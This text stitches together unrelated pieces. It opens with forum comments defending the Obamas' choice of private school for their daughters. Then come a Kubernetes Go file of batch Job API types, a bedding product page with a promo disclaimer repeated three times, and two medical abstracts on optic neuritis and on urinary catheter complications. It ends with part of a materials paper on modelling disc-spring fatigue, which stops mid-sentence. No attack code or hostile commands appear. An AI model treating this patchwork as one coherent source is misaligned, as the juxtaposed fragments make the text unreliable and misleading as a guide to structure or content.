no gangs, no crack being sold on the streets. Malia and Sasha belong in a private school where the instructors understand their position. Not only are they the president's children but they are AFRICAN AMERICAN. don't you think the danger factor increased just a bit ? It is up to Barack and Michelle to decide where they go but i for one will not fault them for making the best decision for their children. Well in the argument of security of the girls, private schools are leagues better. Just look at it, schools like Maret, Sidwell, and GDS all have fences and relatively CLOSED OFF CAMPUSES. this would make it alot harder for someone to just walk onto campus with a gun or something and just kill one of them. And seriously, why the hell would you want to sacrifice your daughters education just to make a point? I think all those people bashing the Obamas should take a tour of the DCPS before they say anything else. I GO TO DCPS (WIlson) and there is no way i would send my kids here. Yall must be smokin crack or something fo real. Yall are just ignorant people. leave them alone If our new Commander in Chief was white I don't think anything would be said about the choice he made for HIS children's education. It would be expected that they would and should attend private school. Both of the Obama's are educated people and they want the same for their children and provided the same before winning this election. I wouldn't put my dog in a DC public school let alone my children. At the end of the day it is their decision and their decision alone. My wife and I have two children in a MD public elementary school. Honestly, if we could afford to send them to private school, we would. That's not to say we're disappointed with the public school system; it's simply that the regional private schools offer a higher quality of education. If the Obamas are able to swing the costs, that's great. They should do what's best for their daughters within their means, no matter what the political circumstances. There is only one chance for doing the right thing for your children. The girls already attended private school in Chicago. Why now that their dad is President should they have to attend Public School? That is crazy! Their life should continue the same way with Private school!
/* Copyright 2016 The Kubernetes Authors All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package batch import ( "k8s.io/kubernetes/pkg/api" "k8s.io/kubernetes/pkg/api/unversioned" ) // +genclient=true // Job represents the configuration of a single job. type Job struct { unversioned.TypeMeta `json:",inline"` // Standard object's metadata. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#metadata api.ObjectMeta `json:"metadata,omitempty"` // Spec is a structure defining the expected behavior of a job. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#spec-and-status Spec JobSpec `json:"spec,omitempty"` // Status is a structure describing current status of a job. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#spec-and-status Status JobStatus `json:"status,omitempty"` } // JobList is a collection of jobs. type JobList struct { unversioned.TypeMeta `json:",inline"` // Standard list metadata // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#metadata unversioned.ListMeta `json:"metadata,omitempty"` // Items is the list of Job. Items []Job `json:"items"` } // JobTemplate describes a template for creating copies of a predefined pod. type JobTemplate struct { unversioned.TypeMeta `json:",inline"` // Standard object's metadata. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#metadata api.ObjectMeta `json:"metadata,omitempty"` // Template defines jobs that will be created from this template // http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#spec-and-status Template JobTemplateSpec `json:"template,omitempty"` } // JobTemplateSpec describes the data a Job should have when created from a template type JobTemplateSpec struct { // Standard object's metadata of the jobs created from this template. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#metadata api.ObjectMeta `json:"metadata,omitempty"` // Specification of the desired behavior of the job. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#spec-and-status Spec JobSpec `json:"spec,omitempty"` } // JobSpec describes how the job execution will look like. type JobSpec struct { // Parallelism specifies the maximum desired number of pods the job should // run at any given time. The actual number of pods running in steady state will // be less than this number when ((.spec.completions - .status.successful) < .spec.parallelism), // i.e. when the work left to do is less than max parallelism. Parallelism *int32 `json:"parallelism,omitempty"` // Completions specifies the desired number of successfully finished pods the // job should be run with. Setting to nil means that the success of any // pod signals the success of all pods, and allows parallelism to have any positive // value. Setting to 1 means that parallelism is limited to 1 and the success of that // pod signals the success of the job. Completions *int32 `json:"completions,omitempty"` // Optional duration in seconds relative to the startTime that the job may be active // before the system tries to terminate it; value must be positive integer ActiveDeadlineSeconds *int64 `json:"activeDeadlineSeconds,omitempty"` // Selector is a label query over pods that should match the pod count. // Normally, the system sets this field for you. Selector *unversioned.LabelSelector `json:"selector,omitempty"` // ManualSelector controls generation of pod labels and pod selectors. // Leave `manualSelector` unset unless you are certain what you are doing. // When false or unset, the system pick labels unique to this job // and appends those labels to the pod template. When true, // the user is responsible for picking unique labels and specifying // the selector. Failure to pick a unique label may cause this // and other jobs to not function correctly. However, You may see // `manualSelector=true` in jobs that were created with the old `extensions/v1beta1` // API. ManualSelector *bool `json:"manualSelector,omitempty"` // Template is the object that describes the pod that will be created when // executing a job. Template api.PodTemplateSpec `json:"template"` } // JobStatus represents the current state of a Job. type JobStatus struct { // Conditions represent the latest available observations of an object's current state. Conditions []JobCondition `json:"conditions,omitempty" patchStrategy:"merge" patchMergeKey:"type"` // StartTime represents time when the job was acknowledged by the Job Manager. // It is not guaranteed to be set in happens-before order across separate operations. // It is represented in RFC3339 form and is in UTC. StartTime *unversioned.Time `json:"startTime,omitempty"` // CompletionTime represents time when the job was completed. It is not guaranteed to // be set in happens-before order across separate operations. // It is represented in RFC3339 form and is in UTC. CompletionTime *unversioned.Time `json:"completionTime,omitempty"` // Active is the number of actively running pods. Active int32 `json:"active,omitempty"` // Succeeded is the number of pods which reached Phase Succeeded. Succeeded int32 `json:"succeeded,omitempty"` // Failed is the number of pods which reached Phase Failed. Failed int32 `json:"failed,omitempty"` } type JobConditionType string // These are valid conditions of a job. const ( // JobComplete means the job has completed its execution. JobComplete JobConditionType = "Complete" // JobFailed means the job has failed its execution. JobFailed JobConditionType = "Failed" ) // JobCondition describes current state of a job. type JobCondition struct { // Type of job condition, Complete or Failed. Type JobConditionType `json:"type"` // Status of the condition, one of True, False, Unknown. Status api.ConditionStatus `json:"status"` // Last time the condition was checked. LastProbeTime unversioned.Time `json:"lastProbeTime,omitempty"` // Last time the condition transit from one status to another. LastTransitionTime unversioned.Time `json:"lastTransitionTime,omitempty"` // (brief) reason for the condition's last transition. Reason string `json:"reason,omitempty"` // Human readable message indicating details about last transition. Message string `json:"message,omitempty"` } // +genclient=true // ScheduledJob represents the configuration of a single scheduled job. type ScheduledJob struct { unversioned.TypeMeta `json:",inline"` // Standard object's metadata. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#metadata api.ObjectMeta `json:"metadata,omitempty"` // Spec is a structure defining the expected behavior of a job, including the schedule. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#spec-and-status Spec ScheduledJobSpec `json:"spec,omitempty"` // Status is a structure describing current status of a job. // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#spec-and-status Status ScheduledJobStatus `json:"status,omitempty"` } // ScheduledJobList is a collection of scheduled jobs. type ScheduledJobList struct { unversioned.TypeMeta `json:",inline"` // Standard list metadata // More info: http://releases.k8s.io/release-1.3/docs/devel/api-conventions.md#metadata unversioned.ListMeta `json:"metadata,omitempty"` // Items is the list of ScheduledJob. Items []ScheduledJob `json:"items"` } // ScheduledJobSpec describes how the job execution will look like and when it will actually run. type ScheduledJobSpec struct { // Schedule contains the schedule in Cron format, see https://en.wikipedia.org/wiki/Cron. Schedule string `json:"schedule"` // Optional deadline in seconds for starting the job if it misses scheduled // time for any reason. Missed jobs executions will be counted as failed ones. StartingDeadlineSeconds *int64 `json:"startingDeadlineSeconds,omitempty"` // ConcurrencyPolicy specifies how to treat concurrent executions of a Job. ConcurrencyPolicy ConcurrencyPolicy `json:"concurrencyPolicy,omitempty"` // Suspend flag tells the controller to suspend subsequent executions, it does // not apply to already started executions. Defaults to false. Suspend *bool `json:"suspend"` // JobTemplate is the object that describes the job that will be created when // executing a ScheduledJob. JobTemplate JobTemplateSpec `json:"jobTemplate"` } // ConcurrencyPolicy describes how the job will be handled. // Only one of the following concurrent policies may be specified. // If none of the following policies is specified, the default one // is AllowConcurrent. type ConcurrencyPolicy string const ( // AllowConcurrent allows ScheduledJobs to run concurrently. AllowConcurrent ConcurrencyPolicy = "Allow" // ForbidConcurrent forbids concurrent runs, skipping next run if previous // hasn't finished yet. ForbidConcurrent ConcurrencyPolicy = "Forbid" // ReplaceConcurrent cancels currently running job and replaces it with a new one. ReplaceConcurrent ConcurrencyPolicy = "Replace" ) // ScheduledJobStatus represents the current state of a Job. type ScheduledJobStatus struct { // Active holds pointers to currently running jobs. Active []api.ObjectReference `json:"active,omitempty"` // LastScheduleTime keeps information of when was the last time the job was successfully scheduled. LastScheduleTime *unversioned.Time `json:"lastScheduleTime,omitempty"` }
**Free standard delivery within the contiguous U.S. on new orders only, a minimum $5.95 value. One time use only. Offer valid only for standard shipping to the first "ship to" address in your order. Enter promo code PL20FS15 on your shopping bag page and select 'standard delivery' on the shipping page. Cannot be combined with other promotions or discounts. Excludes furniture, area rugs, items with heavyweight charges and drop ship items. Does not apply to express shipping, additional address charges and gift wrapping. Does not apply to express, heavyweight, additional address charges, gift wrapping or items shipped directly from the manufacturer. Offer expires at midnight, PDT, 5/18/2015. **Free standard delivery within the contiguous U.S. on new orders only, a minimum $5.95 value. One time use only. Offer valid only for standard shipping to the first "ship to" address in your order. Enter promo code PL20FS15 on your shopping bag page and select 'standard delivery' on the shipping page. Cannot be combined with other promotions or discounts. Excludes furniture, area rugs, items with heavyweight charges and drop ship items. Does not apply to express shipping, additional address charges and gift wrapping. Does not apply to express, heavyweight, additional address charges, gift wrapping or items shipped directly from the manufacturer. Offer expires at midnight, PDT, 5/18/2015. *Free standard delivery within the contiguous U.S. on new orders only, a minimum $5.95 value. One time use only. Offer valid only for standard shipping to the first "ship to" address in your order. Enter promo code PL20FS15 on your shopping bag page and select 'standard delivery' on the shipping page. Cannot be combined with other promotions or discounts. Excludes furniture, area rugs, items with heavyweight charges and drop ship items. Does not apply to express shipping, additional address charges and gift wrapping. Does not apply to express, heavyweight, additional address charges, gift wrapping or items shipped directly from the manufacturer. Offer expires at midnight, PDT, 5/18/2015. Company Organic Solid Percale Sham Overview & Details Certified organic cotton percale is good for the environment and good for you. Woven, dyed and finished to strict Global Organic Textile Standards. Cotton has a smooth, soft hand. Mix with our Company Organic Bramble and Domino Bedding. Machine wash. Imported. Exclusively ours. Artic Blue, Natural, Pecan, Rattan, Dill Green and White. Personalize: Monogram is located 33" inches down from closed end of duvet (centered) All duvet covers come with corner ties that attach to the loops on our comforters to hold both in place. Shown With: Abaca Woven Headboard (XR71) Cotton Twill Pillow Cover in Sunset (OC61) Good for the environment. Good for you. We chose percale for the debut of this very special organic bedding collection, because of its smooth, soft hand and seasonless appeal. Made from certified organic cotton to strict Global Organic Textile Standards, this bedding set brings a fresh, airy feel to any bedroom in your home. Choose from several fabulous solid colors to match your decorating style. Developed by the International Working Group, these standards ensure organic status of textiles, from harvesting through environmentally and socially responsible manufacturing. Preview Check this to apply the same monogramming to all items. Check this to confirm your monogramming selections. *Required Monogram items are non-returnable due to their customization. Please allow an additional 5-7 business days for orders containing monogrammed items and an additional 7-12 business days during holiday & high volume times. Please check out our Monogram Guide for more info.
A nine-year population-based cohort study on the risk of multiple sclerosis in patients with optic neuritis. Patients with optic neuritis (ON) are at an increased risk of developing multiple sclerosis (MS), an illness that may result in physical dysfunction and short life expectancy. Information on the conversion rate to MS of patients with ON is essential in determining the impact of ON on the incidence of MS. Previous Taiwanese studies on the risk of MS in patients with ON were all hospital based, thereby limiting the generalizability of the findings. We aimed to estimate the risk of MS in patients with ON using a nationally representative sample. A cohort of 2,741 patients who sought outpatient care for ON in 2000 was identified from Taiwan's National Health Insurance claims. The control group consisted of 27,330 age- and sex-matched subjects randomly selected from all beneficiaries in 2000. The person-year approach with Poisson assumption was used to estimate the incidence rate of MS from 2000 to 2008. The relative risk of outpatient visit or hospitalization for MS was estimated using the Cox proportional hazard model. The incidence rates of MS in the ON and control groups were 25.6 and 0.4, respectively, per 10,000 person-years; these values represent a relative risk estimate of 30.84 (95% confidence interval: 14.48 to 65.73) after the potential confounders were considered. Female or younger patients with ON were associated with a significantly elevated risk of developing MS. This study found that Taiwanese patients with ON are at a substantially high relative risk of developing MS. In addition to patients with ON, female and younger people should also receive intensive neurological care to further reduce their risk of developing MS.
Retrospective analysis of urologic complications in male patients with spinal cord injury managed with and without indwelling urinary catheters. To compare, in a retrospective fashion, the long-term urologic complications in male patients with spinal cord injury managed with and without indwelling urinary catheters. The records of 142 consecutive male patients with traumatic spinal cord injuries sustained between 1975 and 1985 (inclusive) were reviewed. Fifty-six patients were managed with indwelling urinary catheters, and 86 were managed without an indwelling catheter. Urinary complications were recorded for each patient under the following general subheadings: renal, urinary tract infection, stones, urethral, and other. In all, there were 95 complications in the noncatheterized group versus 202 in the catheterized group (P = 0.007). The catheterized group experienced significantly more problems with renal damage, recurrent urinary tract infection, stones, and urethral complications. Our study shows that elimination of indwelling urinary catheters in patients with spinal cord injury will significantly reduce the incidence of urinary tract complications and lead to better preservation of renal function.
1. Introduction {#sec1-materials-13-01661} =============== The fatigue behavior of disc springs can be described by models ranging widely in complexity. Simple models like the one described in \[[@B1-materials-13-01661],[@B2-materials-13-01661]\] can be implemented using spreadsheet applications, e.g., Microsoft Excel. As models become more sophisticated, the expense of building and evaluating the model rises. With the latest step in creating more complex models, the introduction of scanned geometries, superposed residual stresses, and the Walker damage parameter, the need for a novel algorithm for the determination of Walker damage in loaded disc springs has arisen. The algorithm described in this paper is implemented in the Spring_stack Python module, which can also be used for other applications. For more information on the simulation of single disc springs without a 3D-scanned geometry or with multiple springs in one assembly, see \[[@B3-materials-13-01661],[@B4-materials-13-01661]\]. The algorithm is the first published algorithm to build and evaluate a finite element model from a 3D-scanned geometry without user interaction. It allows the user to obtain an understanding of the influence of geometric deviations that are present in a batch of disc springs on the lifetime of individual disc springs under cyclic loading. This would be impossible without the algorithm because manually conducting a finite element simulation for each disc spring is prohibitively expensive. Introductions to the mathematical description of disc springs and to the Walker damage parameter are given in [Section 2](#sec2-materials-13-01661){ref-type="sec"}. In [Section 3](#sec3-materials-13-01661){ref-type="sec"}, an algorithm used to describe Walker damage at the surface of a 3D-scanned disc spring is presented. Its implementation is described in [Section 4](#sec4-materials-13-01661){ref-type="sec"}. An example application is presented in [Section 5](#sec5-materials-13-01661){ref-type="sec"}. We recommend that readers without programming experience read [Section 5](#sec5-materials-13-01661){ref-type="sec"} before [Section 4](#sec4-materials-13-01661){ref-type="sec"}. 2. Related Research {#sec2-materials-13-01661} =================== 2.1. Mechanical Behavior of Disc Springs {#sec2dot1-materials-13-01661} ---------------------------------------- The first mention of conical disc springs with a rectangular cross-section in the literature was Belleville's patent in 1861 \[[@B5-materials-13-01661],[@B6-materials-13-01661],[@B7-materials-13-01661]\]. The first formulas to compute the characteristic of disc springs, as well as the stresses present in disc springs under load were published by Almen and Laszlo in 1936. These formulas are still in use in today's standards \[[@B1-materials-13-01661],[@B2-materials-13-01661]\], supplemented by a friction formulation published by Curti and Montanini \[[@B8-materials-13-01661]\]. There is a variety of other approaches for the analytical assessment of disc springs, each bringing its own advantages, such as improved accuracy \[[@B9-materials-13-01661],[@B10-materials-13-01661],[@B11-materials-13-01661],[@B12-materials-13-01661],[@B13-materials-13-01661],[@B14-materials-13-01661],[@B15-materials-13-01661],[@B16-materials-13-01661],[@B17-materials-13-01661],[@B18-materials-13-01661],[@B19-materials-13-01661]\], improved simplicity \[[@B20-materials-13-01661]\], applicability for different geometries \[[@B21-materials-13-01661],[@B22-materials-13-01661],[@B23-materials-13-01661],[@B24-materials-13-01661],[@B25-materials-13-01661],[@B26-materials-13-01661],[@B27-materials-13-01661],[@B28-materials-13-01661]\], consideration of new material laws \[[@B29-materials-13-01661],[@B30-materials-13-01661],[@B31-materials-13-01661]\], offering a new concept for friction \[[@B32-materials-13-01661]\], or allowing the computation of resonance frequencies \[[@B33-materials-13-01661]\]. Analytical assessment of disc springs allows a direct understanding of the mechanical nature of disc springs and even the direct identification of links between geometric features and stresses. It also offers a sufficiently precise description of disc springs for applications like fatigue design according to EN 16983 and EN 16984 \[[@B1-materials-13-01661],[@B2-materials-13-01661]\] at low computational costs. They can also be automated easily, which makes these approaches attractive for optimization algorithms like \[[@B34-materials-13-01661],[@B35-materials-13-01661]\] and for analytical models of systems containing multiple components like \[[@B36-materials-13-01661],[@B37-materials-13-01661]\]. Since the 1980s \[[@B38-materials-13-01661]\], disc springs have also been assessed using finite element analysis (FEA). While FEA is expensive in licensing, computational cost, and training, it allows models to be adapted to new, similar problems quickly. The first FEA models were used to exceed the accuracy of the analytical approaches available at that time \[[@B39-materials-13-01661],[@B40-materials-13-01661]\]. FEA is still in use for the verification of new analytical models. FEA has extensively been used to describe residual stresses and changes in the characteristics created by plastic deformation and creep effects \[[@B41-materials-13-01661],[@B42-materials-13-01661],[@B43-materials-13-01661],[@B44-materials-13-01661],[@B45-materials-13-01661],[@B46-materials-13-01661]\]. It has also been used to describe disc springs with complex geometries \[[@B47-materials-13-01661],[@B48-materials-13-01661],[@B49-materials-13-01661],[@B50-materials-13-01661],[@B51-materials-13-01661]\] or complex load cases \[[@B52-materials-13-01661]\], as well as for disc springs made from new materials \[[@B48-materials-13-01661],[@B53-materials-13-01661],[@B54-materials-13-01661],[@B55-materials-13-01661],[@B56-materials-13-01661],[@B57-materials-13-01661]\] and to describe the behavior of assemblies containing disc springs \[[@B58-materials-13-01661],[@B59-materials-13-01661],[@B60-materials-13-01661]\]. Today, 2D models of disc springs solve quickly. An automated tool for the processing of 2D simulations of disc springs was implemented as early as 2000 \[[@B61-materials-13-01661]\]. FEA has been included in the curricula of most engineering programs. Therefore, graduates with basic FEA skills are available to companies. Disc springs have been numerically simulated by free finite element software \[[@B62-materials-13-01661]\]. These effects have led to the literature being split roughly in half between analytical formulas and FEA. The authors believe this distribution to roughly stay the same in the future because both approaches offer unique advantages and because of a legacy effect. The legacy effect is created by fatigue tests being evaluated using a certain method and the raw data like material laws and spring geometries not being documented. Furthermore, engineers are more experienced in the design of springs using analytical formulas, and this experience can only partially be used for the design of springs using FEA. 2.2. The Walker Damage Parameter {#sec2dot2-materials-13-01661} -------------------------------- The Walker damage parameter \[[@B63-materials-13-01661]\] helps to compare the fatigue behavior of materials under different mean stresses. Compared with other approaches to the characterization of mean stress effects in steels \[[@B64-materials-13-01661],[@B65-materials-13-01661],[@B66-materials-13-01661]\], the Walker damage parameter shows a superior lifetime prediction \[[@B67-materials-13-01661]\]. In this paper, the stress-based approach is described. For the strain-based approach, see \[[@B68-materials-13-01661]\]. The Walker damage parameter $P_{Walker}$ is computed from the maximum stress $\sigma_{\max}$, the stress amplitude $\sigma_{amp}$, and the Walker exponent $\gamma$:$$P_{Walker} = \sigma_{\max}^{1 - \gamma}\sigma_{amp}^{\gamma}$$ The Walker exponent $\gamma$ is a material parameter that can be identified by fitting fatigue-curves with different mean stresses or R-ratios. A high Walker exponent implies a low sensitivity to mean stress effects, while a low Walker exponent implies a high sensitivity. If the Walker exponent $\gamma$ is fixed to 0.5, the stress Walker approach is equivalent to the stress Smith--Watson--Topper \[[@B66-materials-13-01661]\] approach. The Walker equation requires $\sigma_{\max}$ and $\sigma_{amp}$ to be scalar values. At the surface of the disc spring, the stress state is two-dimensional; therefore, an equivalent stress must be computed. Here, the von Mises equivalent stress is used. For proportional loads in Quadrant 1, the computation of the maximum stress $\sigma_{\max}$ and the stress amplitude $\sigma_{amp}$ from the minimum and maximum principal stresses $\sigma_{I,\max}$, $\sigma_{{II},\max}$, $\sigma_{I,\min}$, and $\sigma_{{II},\min}$ is obvious. $$\sigma_{\min} = \sqrt{\frac{\sigma_{I,\min}^{2} + \left( {\sigma_{I,\min} - \sigma_{{II},\min}} \right)^{2} + \sigma_{{II},\min}^{2}}{2}}$$ $$\sigma_{\max} = \sqrt{\frac{\sigma_{I,\max}^{2} + \left( {\sigma_{I,\max} - \sigma_{{II},\max}} \right)^{2} + \sigma_{{II},\max}^{2}}{2}}$$ $$\sigma_{amp} = 0.5 \cdot \left( {\sigma_{\max} - \sigma_{\min}} \right)$$ The stress state in disc springs however is non-proportional, especially in shot peened specimens. An example why the formulas given for the proportional case may give inconsistent results for the non-proportional case is depicted in [Figure 1](#materials-13-01661-f001){ref-type="fig"}. Given the stress states $\sigma_{a}$, $\sigma_{b}$, and $\sigma_{c}$ in Quadrant 1, the stress amplitude between $\sigma_{a}$ and $\sigma_{c}$ is equal to the stress amplitude between $\sigma_{b}$ and $\sigma_{c}$ if the von Mises equivalent stress in $\sigma_{a}$ is equal to the von Mises equivalent stress in $\sigma_{b}$. The same applies for mean stresses. In reality, the damage inflicted by cycling between $\sigma_{b}$ and $\sigma_{c}$ is smaller than the damage inflicted by cycling between $\sigma_{a}$ and $\sigma_{c}$. To avoid the described misrepresentation of damage inflicted, the modified Manson--McKnight method \[[@B69-materials-13-01661]\] is used. Instead of computing two scalar stress states $\sigma_{\max}$ and $\sigma_{\min}$ and deducing a scalar amplitude and a scalar mean stress, a two-dimensional stress amplitude and a two-dimensional mean stress are deduced from a two-dimensional maximum and minimum stress state:$$\sigma_{I,{amp}} = 0.5 \cdot \left( {\sigma_{I,\max} - \sigma_{I,\min}} \right)$$ $$\sigma_{{II},{amp}} = 0.5 \cdot \left( {\sigma_{{II},\max} - \sigma_{{II},\min}} \right)$$ $$\sigma_{I,{mean}} = 0.5 \cdot \left( {\sigma_{I,\max} + \sigma_{I,\min}} \right)$$ $$\sigma_{{II},{mean}} = 0.5 \cdot \left( {\sigma_{{II},\max} + \sigma_{{II},\min}} \right)$$ These pairs of stress components are converted into von Mises equivalent stresses:$$\sigma_{amp} = \sqrt{\frac{\sigma_{I,{amp}}^{2} + \left( {\sigma_{I,{amp}} - \sigma_{{II},{amp}}} \right)^{2} + \sigma_{{II},{amp}}^{2}}{2}}$$ $$\sigma_{mean} = \frac{\sigma_{I,{mean}} - \sigma_{{III},{mean}}}{\sigma_{I,{mean}} + \sigma_{{III},{mean}}} \cdot \sqrt{\frac{\sigma_{I,{mean}}^{2} + \left( {\sigma_{I,{mean}} - \sigma_{{II},{mean}}} \right)^{2} + \sigma_{{II},{mean}}^{2}}{2}}$$ The maximum stress $\sigma_{\max}$ is defined with a lower bound to avoid complex numbers as Walker damage parameters. $$\sigma_{\max} = \max\left( {\sigma_{mean} + \sigma_{amp},0} \right)$$ 3. The Algorithm {#sec3-materials-13-01661} ================ 3.1. General Concept {#sec3dot1-materials-13-01661} -------------------- The algorithm starts with a surface mesh (given as an .STL file) of a disc spring placed randomly in space. After aligning the disc spring approximately symmetrically around the y-axis, it imports the geometry information into a finite element application. In our implementation of the algorithm, the finite element application was used. Through the Abaqus Scripting interface \[[@B70-materials-13-01661],[@B71-materials-13-01661]\], it builds a model around the geometry data, using additional inputs like loads and friction coefficients provided by the user. It generates an output database file using the Abaqus/Standard Solver. Utilizing Abaqus/Viewer functionalities via the Scripting interface, a field of residual stresses is generated from input data. Aggregated minimum and maximum stress fields are computed by superposing the computed load stress field and the residual stress field. A Walker damage parameter field is computed from the minimum and maximum stress fields. The Walker damage parameter at the surface of the disc spring is computed and exported as tabular data. 3.2. Architecture {#sec3dot2-materials-13-01661} ----------------- The software architecture used is called a pipeline in programming terms and resembles a production line: an instance of the class Spring_stack is passed through a series of different processing stations. The processing stations gradually transform the instance from input data to a solved finite element model with post-processed output fields and from there to easily readable tabular data and a graphical representation thereof. In programming terms, these processing stations are called methods. The flow of data is depicted in [Figure 2](#materials-13-01661-f002){ref-type="fig"}. 3.3. User-provided Inputs {#sec3dot3-materials-13-01661} ------------------------- To conduct the inquiry described above, the algorithm requires several inputs. These inputs are provided by the user. They are comprised of an .STL file containing the triangle surface mesh of a scanned disc spring and one .JSON file for the description of the simulated physical situation and the numerical configuration of the simulation, respectively. The .JSON file describing the simulated physical situation contains an array of parts defining the geometry, the Walker exponent $\gamma$, Young's modulus, the Poisson number, and a volumetric mass density (for numerical stability) for each. The geometry of scanned disc springs is given by means of a link to an .STL file. Plasticity may be defined for disc springs in the present implementation. However, this is not in the scope of this paper. Furthermore, the friction coefficients between springs stacked in parallel and springs stacked in series, as well as between springs and the plates and the pillar are committed. The axial load is committed as an array of paths, giving the displacements of one of the plates at the end of each time step. Measured residual stresses in the radial and tangential direction are committed for two points with different coordinates. These two points should be selected carefully by the user and ideally describe a linear model representing more measurements. Furthermore, a target value for the number of triangles of the coarsened triangle surface mesh is committed. The .JSON file describing the numeric inputs contains several naming definitions, element types, solver options, contact and friction formulations, computing resource allowances, and flags determining whether stresses etc. are to be written to input files. Different modeling conventions for plates and pillars may be used in the current implementation. However, this is outside the scope of this paper. 4. Implementation {#sec4-materials-13-01661} ================= 4.1. Aligning the Disc Spring {#sec4dot1-materials-13-01661} ----------------------------- In order to build a model around a part, the alignment of the part in space must be known. For example, to apply axial loads, the axial direction of the loaded part must be known. Because it makes the rest of the algorithm much easier, the input disc spring is preprocessed so it always has the same orientation. By convention, this position is in the point of origin, closely axially symmetric to the *y*-axis. In the alignment process, the mesh $\mathcal{M}_{start}$ is processed as a set of vertices $\mathbf{V}_{start} = \left\{ \mathbf{v}_{1},\cdots,\mathbf{v}_{v} \right\}$ and a set of triangles $\mathbf{e} = \left\{ \mathbf{e}_{1},\cdots,\mathbf{e}_{e} \right\}$ connecting these vertices. The vertices $\mathbf{v}_{i,{start}} = \left( x_{i,{start}},y_{i,{start}},z_{i,{start}} \right)$ are defined in a Cartesian coordinate system $\left( x,y,z \right)$. The point set is aligned by a translation $\mathbf{t}\left( {t_{x},t_{y},t_{z},\mathbf{V}} \right)$ along and a rotation $\mathbf{A}\left( {\theta_{x},\theta_{y},\theta_{z}} \right)$ around the principal axes. $$\mathbf{V}_{aligned}\left( {\mathbf{A},\mathbf{t},\mathbf{V}_{start}} \right) = \mathbf{A}\left( {\theta_{x},\theta_{y},\theta_{z}} \right) \cdot \mathbf{t}\left( {t_{x},t_{y},t_{z},\mathbf{V}_{start}} \right)$$ The edges are defined as connectors between vertices; therefore, a geometric transformation of any mesh $\mathcal{M}$ is fully described by a geometric transformation of its vertices $\mathbf{V}$. The resulting mesh $\mathcal{M}_{aligned}$ is defined by the vertices $\mathbf{V}_{aligned}$ and the edges $\mathbf{e}$. A feasible combination of translation $\mathbf{t}$ and rotation $\mathbf{A}$ is found by solving an optimization problem. $$\min\limits_{\mathbf{\theta}_{x,y,z},\mathbf{t}_{x,y,z}}f\left( {\mathbf{V}_{aligned}\left( {\mathbf{A},\mathbf{t},\mathbf{V}_{start}} \right)} \right)$$ To compute the objective function *f*, the transformed point cloud $\mathbf{V}_{aligned}$ is projected into the $xy$-plane, producing $\mathbf{V}_{xy} = \left\{ {\mathbf{v}_{xy,1},\cdots,\mathbf{v}_{xy,v}} \right\}$ by rotation around the *y*-axis. $\mathbf{V}_{xy}$ is computed using the coordinates of $\mathbf{V}_{aligned}$:$$\mathbf{v}_{xy,i} = \begin{pmatrix} \sqrt{x_{i,{aligned}}^{2} + y_{i,{aligned}}^{2}} \\ z_{i,{aligned}} \\ \end{pmatrix}$$ The objective function *f* is defined as the area *A* of the convex hull of $\mathbf{V}_{xy}$. $$f = A\left( {Conv\left( \mathbf{V}_{xy} \right)} \right)$$ The convex hull is computed using the Quickhull algorithm \[[@B72-materials-13-01661],[@B73-materials-13-01661]\]. The objective function *f* is invariant to rotations around the *y*-axis. Therefore, $\theta_{y}$ is fixed to zero. To further simplify the optimization problem, it is assumed that the centroid of the aligned mesh $c\left( \mathcal{M}_{aligned} \right)$ lies in the point of origin. Although this assumption is applicable only for perfectly symmetric spring geometries, we assumed that for springs possessing minor deviations regarding their symmetry, the assumption holds true, too. Based on this assumption, $\mathbf{t}$ is defined as translating the volumetric centroid *c* of the mesh $\mathcal{M}_{start}$ into the point of origin. $$c\left( \mathcal{M}_{translated} \right) = \left( {0,0,0} \right)$$ The computational cost for finding $\mathbf{t}$ is low because the volumetric centroid of any closed mesh $\mathcal{M}$ can be computed inexpensively. In the following rotation $\mathbf{A}$, the mesh $\mathcal{M}_{translated}$ is only rotated around the principal axes. As the volumetric centroid lies on all three principal axes, it is invariant under said rotation $\mathbf{A}$. $$c\left( \mathcal{M}_{aligned} \right) = c\left( \mathcal{M}_{translated} \right) = \left( {0,0,0} \right)$$ By fixing the translation additionally to the rotation around the *y*-axis, the dimensionality of the optimization problem is reduced from six to two. $$\min\limits_{\mathbf{\theta}_{x,z}}f\left( {\mathbf{V}_{aligned}\left( {\mathbf{A},\mathbf{t},\mathbf{V}_{start}} \right)} \right)$$ The parameters $\theta_{x}$ and $\theta_{z}$ are calculated using the L-BFGS-B method \[[@B73-materials-13-01661],[@B74-materials-13-01661],[@B75-materials-13-01661]\]. The resulting mesh $\mathcal{M}_{aligned}$ may be aligned upside down. This being the case, it can simply be rotated by 180 degrees around the *x*-axis. To further ease the following steps, it is translated along the *y*-axis, so its lowest point is in the $xz$-plane. $$\min\left( y_{i,{postprocessed}} \right) = 0$$ The postprocessed, aligned mesh $\mathcal{M}_{postprocessed}$ is exported as an Abaqus input file (.inp). 4.2. Building the Finite Element Model {#sec4dot2-materials-13-01661} -------------------------------------- The creation of the model is structured as a pipeline inside the pipeline depicted in [Figure 2](#materials-13-01661-f002){ref-type="fig"}. The sub-pipeline is depicted in [Figure 3](#materials-13-01661-f003){ref-type="fig"}. The allotment of tasks to processing stations (methods) along the pipeline is based on the allotment of functionalities to modules in the Abaqus/CAE environment. Each of the processing stations is customized according to input data. The following paragraphs describe the individual processing stations. For the simulation of a single disc spring, four components are required: the disc spring itself, a guide pin, and two flat plates. The geometry of the disc spring is read from the input file generated from the 3D-scan data. The guide pin is defined as an idealized cylinder with the same height as the disc spring, and the plates are defined as idealized planes. The plate and the guide pin part instances are defined as analytic rigid surfaces and therefore do not need to be meshed. The part instance representing the disc spring is imported as a triangle 